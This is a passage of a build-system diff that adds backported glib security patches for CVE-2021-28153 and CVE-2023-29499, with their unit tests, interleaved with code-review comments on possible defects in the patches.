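+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/tests/file.c | 4 +---
+ 1 file changed, 1 insertion(+), 3 deletions(-)
+
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -685,7 +685,7 @@ test_replace_cancel (void)
+ guint count;
+ GError *error = NULL;
+
+- g_test_bug ("629301");
++ g_test_bug ("https://bugzilla.gnome.org/629301");
+
+ path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error);
+ g_assert_no_error (error);
+@@ -1784,8 +1784,6 @@ main (int argc, char *argv[])
+ {
+ g_test_init (&argc, &argv, NULL);
+
+- g_test_bug_base ("http://bugzilla.gnome.org/");
+-
+ g_test_add_func ("/file/basic", test_basic);
+ g_test_add_func ("/file/build-filename", test_build_filename);
+ g_test_add_func ("/file/parent", test_parent);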
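diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
new file mode 100644
index 0000000000..a82febd26e
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-3.patch
@@ -0,0 +1,57 @@
+Backport of:
+
+From ce0eb088a68171eed3ac217cb92a72e36eb57d1b Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 10 Mar 2021 16:05:55 +0000
+Subject: [PATCH 3/5] glocalfileoutputstream: Factor out a flag check
+
+This clarifies the code a little. It introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 7 ++++---
+ 1 file changed, 4 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -847,6 +847,7 @@ handle_overwrite_open (const char *fi
+ int res;
+ int mode;
+ int errsv;
++ gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);
+
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+@@ -954,7 +955,7 @@ handle_overwrite_open (const char *fi
+ * to a backup file and rewrite the contents of the file.
+ */
+
+- if ((flags & G_FILE_CREATE_REPLACE_DESTINATION) ||
++ if (replace_destination_set ||
+ (!(original_stat.st_nlink > 1) && !is_symlink))
+ {
+ char *dirname, *tmp_filename;
+@@ -973,7 +974,7 @@ handle_overwrite_open (const char *fi
+
+ /* try to keep permissions (unless replacing) */
+
+- if ( ! (flags & G_FILE_CREATE_REPLACE_DESTINATION) &&
++ if (!replace_destination_set &&
+ (
+ #ifdef HAVE_FCHOWN
+ fchown (tmpfd, original_stat.st_uid, original_stat.st_gid) == -1 ||
+@@ -1112,7 +1113,7 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- if (flags & G_FILE_CREATE_REPLACE_DESTINATION)
++ if (replace_destination_set)
+ {
+ g_close (fd, NULL);
+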
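Review bot: `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION);` stores the raw masked bit rather than a 0/1 value, so the variable is only correct under truthiness tests such as the `if (replace_destination_set ||` and `if (!replace_destination_set &&` uses in this patch. Writing it as `gboolean replace_destination_set = (flags & G_FILE_CREATE_REPLACE_DESTINATION) != 0;` keeps it safe if later code compares it with `TRUE` or combines it with other booleans. `handle_overwrite_open` starts and ends outside these hunks, so any further use of the variable is not visible here.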
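diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
new file mode 100644
index 0000000000..5b106e8474
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-4.patch
@@ -0,0 +1,265 @@
+Backport of:
+
+From 317b3b587058a05dca95d56dac26568c5b098d33 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:36:07 +0000
+Subject: [PATCH 4/5] glocalfileoutputstream: Fix CREATE_REPLACE_DESTINATION
+ with symlinks
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The `G_FILE_CREATE_REPLACE_DESTINATION` flag is equivalent to unlinking
+the destination file and re-creating it from scratch. That did
+previously work, but in the process the code would call `open(O_CREAT)`
+on the file. If the file was a dangling symlink, this would create the
+destination file (empty). That’s not an intended side-effect, and has
+security implications if the symlink is controlled by a lower-privileged
+process.
+
+Fix that by not opening the destination file if it’s a symlink, and
+adjusting the rest of the code to cope with
+ - the fact that `fd == -1` is not an error iff `is_symlink` is true,
+ - and that `original_stat` will contain the `lstat()` results for the
+ symlink now, rather than the `stat()` results for its target (again,
+ iff `is_symlink` is true).
+
+This means that the target of the dangling symlink is no longer created,
+which was the bug. The symlink itself continues to be replaced (as
+before) with the new file — this is the intended behaviour of
+`g_file_replace()`.
+
+The behaviour for non-symlink cases, or cases where the symlink was not
+dangling, should be unchanged.
+
+Includes a unit test.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2325
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 77 ++++++++++++++++++-------
+ gio/tests/file.c | 108 +++++++++++++++++++++++++++++++++++
+ 2 files changed, 163 insertions(+), 22 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -875,16 +875,22 @@ handle_overwrite_open (const char *fi
+ /* Could be a symlink, or it could be a regular ELOOP error,
+ * but then the next open will fail too. */
+ is_symlink = TRUE;
+- fd = g_open (filename, open_flags, mode);
++ if (!replace_destination_set)
++ fd = g_open (filename, open_flags, mode);
+ }
+-#else
+- fd = g_open (filename, open_flags, mode);
+- errsv = errno;
++#else /* if !O_NOFOLLOW */
+ /* This is racy, but we do it as soon as possible to minimize the race */
+ is_symlink = g_file_test (filename, G_FILE_TEST_IS_SYMLINK);
++
++ if (!is_symlink || !replace_destination_set)
++ {
++ fd = g_open (filename, open_flags, mode);
++ errsv = errno;
++ }
+ #endif
+
+- if (fd == -1)
++ if (fd == -1 &&
++ (!is_symlink || !replace_destination_set))
+ {
+ char *display_name = g_filename_display_name (filename);
+ g_set_error (error, G_IO_ERROR,
+@@ -898,7 +904,14 @@ handle_overwrite_open (const char *fi
+ #ifdef G_OS_WIN32
+ res = GLIB_PRIVATE_CALL (g_win32_fstat) (fd, &original_stat);
+ #else
+- res = fstat (fd, &original_stat);
++ if (!is_symlink)
++ {
++ res = fstat (fd, &original_stat);
++ }
++ else
++ {
++ res = lstat (filename, &original_stat);
++ }
+ #endif
+ errsv = errno;
+
+@@ -917,16 +930,27 @@ handle_overwrite_open (const char *fi
+ if (!S_ISREG (original_stat.st_mode))
+ {
+ if (S_ISDIR (original_stat.st_mode))
+- g_set_error_literal (error,
+- G_IO_ERROR,
+- G_IO_ERROR_IS_DIRECTORY,
+- _("Target file is a directory"));
+- else
+- g_set_error_literal (error,
++ {
++ g_set_error_literal (error,
++ G_IO_ERROR,
++ G_IO_ERROR_IS_DIRECTORY,
++ _("Target file is a directory"));
++ goto err_out;
++ }
++ else if (!is_symlink ||
++#ifdef S_ISLNK
++ !S_ISLNK (original_stat.st_mode)
++#else
++ FALSE
++#endif
++ )
++ {
++ g_set_error_literal (error,
+ G_IO_ERROR,
+ G_IO_ERROR_NOT_REGULAR_FILE,
+ _("Target file is not a regular file"));
+- goto err_out;
++ goto err_out;
++ }
+ }
+
+ if (etag != NULL)
+@@ -1007,7 +1031,8 @@ handle_overwrite_open (const char *fi
+ }
+ }
+
+- g_close (fd, NULL);
++ if (fd >= 0)
++ g_close (fd, NULL);
+ *temp_filename = tmp_filename;
+ return tmpfd;
+ }
+--- a/gio/tests/file.c
++++ b/gio/tests/file.c
+@@ -804,6 +804,113 @@ test_replace_cancel (void)
+ g_object_unref (tmpdir);
+ }
+
++static void
++test_replace_symlink (void)
++{
++#ifdef G_OS_UNIX
++ gchar *tmpdir_path = NULL;
++ GFile *tmpdir = NULL, *source_file = NULL, *target_file = NULL;
++ GFileOutputStream *stream = NULL;
++ const gchar *new_contents = "this is a test message which should be written to source and not target";
++ gsize n_written;
++ GFileEnumerator *enumerator = NULL;
++ GFileInfo *info = NULL;
++ gchar *contents = NULL;
++ gsize length = 0;
++ GError *local_error = NULL;
++
++ g_test_bug ("https://gitlab.gnome.org/GNOME/glib/-/issues/2325");
++ g_test_summary ("Test that G_FILE_CREATE_REPLACE_DESTINATION doesn’t follow symlinks");
++
++ /* Create a fresh, empty working directory. */
++ tmpdir_path = g_dir_make_tmp ("g_file_replace_symlink_XXXXXX", &local_error);
++ g_assert_no_error (local_error);
++ tmpdir = g_file_new_for_path (tmpdir_path);
++
++ g_test_message ("Using temporary directory %s", tmpdir_path);
++ g_free (tmpdir_path);
++
++ /* Create symlink `source` which points to `target`. */
++ source_file = g_file_get_child (tmpdir, "source");
++ target_file = g_file_get_child (tmpdir, "target");
++ g_file_make_symbolic_link (source_file, "target", NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ /* Ensure that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Replace the `source` symlink with a regular file using
++ * %G_FILE_CREATE_REPLACE_DESTINATION, which should replace it *without*
++ * following the symlink */
++ stream = g_file_replace (source_file, NULL, FALSE /* no backup */,
++ G_FILE_CREATE_REPLACE_DESTINATION, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_output_stream_write_all (G_OUTPUT_STREAM (stream), new_contents, strlen (new_contents),
++ &n_written, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpint (n_written, ==, strlen (new_contents));
++
++ g_output_stream_close (G_OUTPUT_STREAM (stream), NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&stream);
++
++ /* At this point, there should still only be one file: `source`. It should
++ * now be a regular file. `target` should not exist. */
++ enumerator = g_file_enumerate_children (tmpdir,
++ G_FILE_ATTRIBUTE_STANDARD_NAME ","
++ G_FILE_ATTRIBUTE_STANDARD_TYPE,
++ G_FILE_QUERY_INFO_NOFOLLOW_SYMLINKS, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_nonnull (info);
++
++ g_assert_cmpstr (g_file_info_get_name (info), ==, "source");
++ g_assert_cmpint (g_file_info_get_file_type (info), ==, G_FILE_TYPE_REGULAR);
++
++ g_clear_object (&info);
++
++ info = g_file_enumerator_next_file (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_assert_null (info);
++
++ g_file_enumerator_close (enumerator, NULL, &local_error);
++ g_assert_no_error (local_error);
++ g_clear_object (&enumerator);
++
++ /* Double-check that `target` doesn’t exist */
++ g_assert_false (g_file_query_exists (target_file, NULL));
++
++ /* Check the content of `source`. */
++ g_file_load_contents (source_file,
++ NULL,
++ &contents,
++ &length,
++ NULL,
++ &local_error);
++ g_assert_no_error (local_error);
++ g_assert_cmpstr (contents, ==, new_contents);
++ g_assert_cmpuint (length, ==, strlen (new_contents));
++ g_free (contents);
++
++ /* Tidy up. */
++ g_file_delete (source_file, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_file_delete (tmpdir, NULL, &local_error);
++ g_assert_no_error (local_error);
++
++ g_clear_object (&target_file);
++ g_clear_object (&source_file);
++ g_clear_object (&tmpdir);
++#else /* if !G_OS_UNIX */
++ g_test_skip ("Symlink replacement tests can only be run on Unix")
++#endif
++}
++
+ static void
+ on_file_deleted (GObject *object,
+ GAsyncResult *result,
+@@ -1752,6 +1859,7 @@ main (int argc, char *argv[])
+ g_test_add_data_func ("/file/async-create-delete/4096", GINT_TO_POINTER (4096), test_create_delete);
+ g_test_add_func ("/file/replace-load", test_replace_load);
+ g_test_add_func ("/file/replace-cancel", test_replace_cancel);
++ g_test_add_func ("/file/replace-symlink", test_replace_symlink);
+ g_test_add_func ("/file/async-delete", test_async_delete);
+ #ifdef G_OS_UNIX
+ g_test_add_func ("/file/copy-preserve-mode", test_copy_preserve_mode);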
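Review bot: The `#else /* if !G_OS_UNIX */` branch of `test_replace_symlink` ends with `g_test_skip ("Symlink replacement tests can only be run on Unix")` and no semicolon, so `gio/tests/file.c` will not compile wherever `G_OS_UNIX` is undefined; the line should read `g_test_skip ("Symlink replacement tests can only be run on Unix");`. In `handle_overwrite_open`, the `#else /* if !O_NOFOLLOW */` path now skips `g_open()` when `is_symlink && replace_destination_set`, and the later `if (fd >= 0) g_close (fd, NULL);` then depends on `fd` already holding -1. Its declaration is outside the hunk, so confirm it is initialised (`int fd = -1;`) in the 2.64 tree this backport targets. The `g_close (fd, NULL);` under `if (replace_destination_set)`, visible as context in CVE-2021-28153-3.patch, did not receive the same `fd >= 0` guard; whether it can be reached with `fd == -1` depends on code outside these hunks.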
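diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
new file mode 100644
index 0000000000..2334147f7d
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-5.patch
@@ -0,0 +1,55 @@
+From 6c6439261bc7a8a0627519848a7222b3e1bd4ffe Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:42:24 +0000
+Subject: [PATCH 5/5] glocalfileoutputstream: Add a missing O_CLOEXEC flag to
+ replace()
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 15 ++++++++++++---
+ 1 file changed, 12 insertions(+), 3 deletions(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -58,6 +58,12 @@
+ #define O_BINARY 0
+ #endif
+
++#ifndef O_CLOEXEC
++#define O_CLOEXEC 0
++#else
++#define HAVE_O_CLOEXEC 1
++#endif
++
+ struct _GLocalFileOutputStreamPrivate {
+ char *tmp_filename;
+ char *original_filename;
+@@ -1223,7 +1229,7 @@ _g_local_file_output_stream_replace (con
+ sync_on_close = FALSE;
+
+ /* If the file doesn't exist, create it */
+- open_flags = O_CREAT | O_EXCL | O_BINARY;
++ open_flags = O_CREAT | O_EXCL | O_BINARY | O_CLOEXEC;
+ if (readable)
+ open_flags |= O_RDWR;
+ else
+@@ -1253,8 +1259,11 @@ _g_local_file_output_stream_replace (con
+ set_error_from_open_errno (filename, error);
+ return NULL;
+ }
+-
+-
++#if !defined(HAVE_O_CLOEXEC) && defined(F_SETFD)
++ else
++ fcntl (fd, F_SETFD, FD_CLOEXEC);
++#endif
++
+ stream = g_object_new (G_TYPE_LOCAL_FILE_OUTPUT_STREAM, NULL);
+ stream->priv->fd = fd;
+ stream->priv->sync_on_close = sync_on_close;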
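Review bot: `O_CLOEXEC` is added only to the create-new open in `_g_local_file_output_stream_replace`; the overwrite path in `handle_overwrite_open` still builds `open_flags = O_RDWR | O_CREAT | O_BINARY;` (visible as context in CVE-2021-28153-1.patch) and nothing in this series changes it, so a descriptor obtained there would presumably still be inherited by child processes. Unless that is handled outside the visible hunks, the same flag belongs there as well, e.g. `open_flags = O_RDWR | O_CREAT | O_BINARY | O_CLOEXEC;`. The fallback `fcntl (fd, F_SETFD, FD_CLOEXEC);` discards its return value, and the `if`/`else` chain it hangs off starts outside the hunk, so which descriptors it covers cannot be confirmed from here.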
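diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
new file mode 100644
index 0000000000..ce90586290
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-29499.patch
@@ -0,0 +1,290 @@
+From 5f4485c4ff57fdefb1661531788def7ca5a47328 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 17 Aug 2023 04:19:44 +0000
+Subject: [PATCH] gvariant-serialiser: Check offset table entry size is minimal
+
+The entries in an offset table (which is used for variable sized arrays
+and tuples containing variable sized members) are sized so that they can
+address every byte in the overall variant.
+
+The specification requires that for a variant to be in normal form, its
+offset table entries must be the minimum width such that they can
+address every byte in the variant.
+
+That minimality requirement was not checked in
+`g_variant_is_normal_form()`, leading to two different byte arrays being
+interpreted as the normal form of a given variant tree. That kind of
+confusion could potentially be exploited, and is certainly a bug.
+
+Fix it by adding the necessary checks on offset table entry width, and
+unit tests.
+
+Spotted by William Manley.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2794
+
+CVE: CVE-2023-29499
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/5f4485c4ff57fdefb1661531788def7ca5a47328]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 19 +++-
+ glib/tests/gvariant.c | 176 +++++++++++++++++++++++++++++++++++++
+ 2 files changed, 194 insertions(+), 1 deletion(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 0bf7243..5aa2cbc 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -694,6 +694,10 @@ gvs_variable_sized_array_get_frame_offsets (GVariantSerialised value)
+ out.data_size = last_end;
+ out.array = value.data + last_end;
+ out.length = offsets_array_size / out.offset_size;
++
++ if (out.length > 0 && gvs_calculate_total_size (last_end, out.length) != value.size)
++ return out; /* offset size not minimal */
++
+ out.is_normal = TRUE;
+
+ return out;
+@@ -1201,6 +1205,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ gsize length;
+ gsize offset;
+ gsize i;
++ gsize offset_table_size;
+
+ /* as per the comment in gvs_tuple_get_child() */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+@@ -1305,7 +1310,19 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ }
+ }
+
+- return offset_ptr == offset;
++ /* @offset_ptr has been counting backwards from the end of the variant, to
++ * find the beginning of the offset table. @offset has been counting forwards
++ * from the beginning of the variant to find the end of the data. They should
++ * have met in the middle. */
++ if (offset_ptr != offset)
++ return FALSE;
++
++ offset_table_size = value.size - offset_ptr;
++ if (value.size > 0 &&
++ gvs_calculate_total_size (offset, offset_table_size / offset_size) != value.size)
++ return FALSE; /* offset size not minimal */
++
++ return TRUE;
+ }
+
+ /* Variants {{{2
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index d640c81..4ce0e4f 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -5092,6 +5092,86 @@ test_normal_checking_array_offsets2 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_array_offsets_minimal_sized (void)
++{
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *aay_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *aay_deserialised = NULL;
++ GVariant *aay_normalised = NULL;
++
++ /* Construct an array of type aay, consisting of 128 elements which are each
++ * an empty array, i.e. `[[] * 128]`. This is chosen because the inner
++ * elements are variable sized (making the outer array variable sized, so it
++ * must have an offset table), but they are also zero-sized when serialised.
++ * So the serialised representation of @aay_constructed consists entirely of
++ * its offset table, which is entirely zeroes.
++ *
++ * The array is chosen to be 128 elements long because that means offset
++ * table entries which are 1 byte long. If the elements in the array were
++ * non-zero-sized (to the extent that the overall array is ≥256 bytes long),
++ * the offset table entries would end up being 2 bytes long. */
++ g_variant_builder_init (&builder, G_VARIANT_TYPE ("aay"));
++
++ for (i = 0; i < 128; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ aay_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed array is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (aay_constructed));
++ g_assert_cmpuint (g_variant_n_children (aay_constructed), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_constructed), ==, 128);
++
++ data = g_variant_get_data (aay_constructed);
++ for (i = 0; i < g_variant_get_size (aay_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `aay` GVariant which is `b'\0' * 256`. This has to
++ * be a non-normal form of `[[] * 128]`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the elements of the array are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ aay_deserialised = g_variant_new_from_data (G_VARIANT_TYPE ("aay"),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (aay_deserialised));
++ g_assert_cmpuint (g_variant_n_children (aay_deserialised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_deserialised), ==, 256);
++
++ data = g_variant_get_data (aay_deserialised);
++ for (i = 0; i < g_variant_get_size (aay_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ aay_normalised = g_variant_get_normal_form (aay_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (aay_normalised));
++ g_assert_cmpuint (g_variant_n_children (aay_normalised), ==, 128);
++ g_assert_cmpuint (g_variant_get_size (aay_normalised), ==, 128);
++
++ data = g_variant_get_data (aay_normalised);
++ for (i = 0; i < g_variant_get_size (aay_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (aay_normalised);
++ g_variant_unref (aay_deserialised);
++ g_variant_unref (aay_constructed);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5286,6 +5366,98 @@ test_normal_checking_tuple_offsets4 (void)
+ g_variant_unref (variant);
+ }
+
++/* Test that an otherwise-valid serialised GVariant is considered non-normal if
++ * its offset table entries are too wide.
++ *
++ * See §2.3.6 (Framing Offsets) of the GVariant specification. */
++static void
++test_normal_checking_tuple_offsets_minimal_sized (void)
++{
++ GString *type_string = NULL;
++ GVariantBuilder builder;
++ gsize i;
++ GVariant *ray_constructed = NULL;
++ const guint8 *data = NULL;
++ guint8 *data_owned = NULL;
++ GVariant *ray_deserialised = NULL;
++ GVariant *ray_normalised = NULL;
++
++ /* Construct a tuple of type (ay…ay), consisting of 129 members which are each
++ * an empty array, i.e. `([] * 129)`. This is chosen because the inner
++ * members are variable sized, so the outer tuple must have an offset table,
++ * but they are also zero-sized when serialised. So the serialised
++ * representation of @ray_constructed consists entirely of its offset table,
++ * which is entirely zeroes.
++ *
++ * The tuple is chosen to be 129 members long because that means it has 128
++ * offset table entries which are 1 byte long each. If the members in the
++ * tuple were non-zero-sized (to the extent that the overall tuple is ≥256
++ * bytes long), the offset table entries would end up being 2 bytes long.
++ *
++ * 129 members are used unlike 128 array elements in
++ * test_normal_checking_array_offsets_minimal_sized(), because the last member
++ * in a tuple never needs an offset table entry. */
++ type_string = g_string_new ("");
++ g_string_append_c (type_string, '(');
++ for (i = 0; i < 129; i++)
++ g_string_append (type_string, "ay");
++ g_string_append_c (type_string, ')');
++
++ g_variant_builder_init (&builder, G_VARIANT_TYPE (type_string->str));
++
++ for (i = 0; i < 129; i++)
++ g_variant_builder_add_value (&builder, g_variant_new_array (G_VARIANT_TYPE_BYTE, NULL, 0));
++
++ ray_constructed = g_variant_builder_end (&builder);
++
++ /* Verify that the constructed tuple is in normal form, and its serialised
++ * form is `b'\0' * 128`. */
++ g_assert_true (g_variant_is_normal_form (ray_constructed));
++ g_assert_cmpuint (g_variant_n_children (ray_constructed), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_constructed), ==, 128);
++
++ data = g_variant_get_data (ray_constructed);
++ for (i = 0; i < g_variant_get_size (ray_constructed); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Construct a serialised `(ay…ay)` GVariant which is `b'\0' * 256`. This has
++ * to be a non-normal form of `([] * 129)`, with 2-byte-long offset table
++ * entries, because each offset table entry has to be able to reference all of
++ * the byte boundaries in the container. All the entries in the offset table
++ * are zero, so all the members of the tuple are zero-sized. */
++ data = data_owned = g_malloc0 (256);
++ ray_deserialised = g_variant_new_from_data (G_VARIANT_TYPE (type_string->str),
++ data,
++ 256,
++ FALSE,
++ g_free,
++ g_steal_pointer (&data_owned));
++
++ g_assert_false (g_variant_is_normal_form (ray_deserialised));
++ g_assert_cmpuint (g_variant_n_children (ray_deserialised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_deserialised), ==, 256);
++
++ data = g_variant_get_data (ray_deserialised);
++ for (i = 0; i < g_variant_get_size (ray_deserialised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ /* Get its normal form. That should change the serialised size. */
++ ray_normalised = g_variant_get_normal_form (ray_deserialised);
++
++ g_assert_true (g_variant_is_normal_form (ray_normalised));
++ g_assert_cmpuint (g_variant_n_children (ray_normalised), ==, 129);
++ g_assert_cmpuint (g_variant_get_size (ray_normalised), ==, 128);
++
++ data = g_variant_get_data (ray_normalised);
++ for (i = 0; i < g_variant_get_size (ray_normalised); i++)
++ g_assert_cmpuint (data[i], ==, 0);
++
++ g_variant_unref (ray_normalised);
++ g_variant_unref (ray_deserialised);
++ g_variant_unref (ray_constructed);
++ g_string_free (type_string, TRUE);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5431,6 +5603,8 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
+ test_normal_checking_array_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets/minimal-sized",
++ test_normal_checking_array_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
+@@ -5439,6 +5613,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuple_offsets3);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
+ test_normal_checking_tuple_offsets4);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets/minimal-sized",
++ test_normal_checking_tuple_offsets_minimal_sized);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+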
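Review bot: In `gvs_tuple_is_normal` the new division `offset_table_size / offset_size` is protected only by the `value.size > 0 &&` operand in front of it. `offset_size` is computed outside the hunk; presumably it is 0 for an empty value, in which case reordering that condition would divide by zero. A one-line comment above the `if`, such as `/* value.size > 0 must be tested first: offset_size may be 0 for an empty tuple */`, would keep that dependency visible. In `gvs_variable_sized_array_get_frame_offsets` the early `return out; /* offset size not minimal */` reports non-normal only if `out.is_normal` starts out FALSE, which is also set outside the hunk and is worth confirming in the sources this backport targets.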
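diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
new file mode 100644
index 0000000000..b2187f2af9
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32611-0001.patch
@@ -0,0 +1,89 @@
+From 1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1 Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 9 Aug 2023 10:04:49 +0000
+Subject: [PATCH] gvariant-core: Consolidate construction of
+ `GVariantSerialised`
+
+So I only need to change it in one place.
+
+This introduces no functional changes.
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/1deacdd4e8e35a5cf1417918ca4f6b0afa6409b1]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant.c | 8 +++++---
+ glib/tests/gvariant.c | 24 ++++++++++++++++++++++++
+ 2 files changed, 29 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index 8ba701e..4dbd9e8 100644
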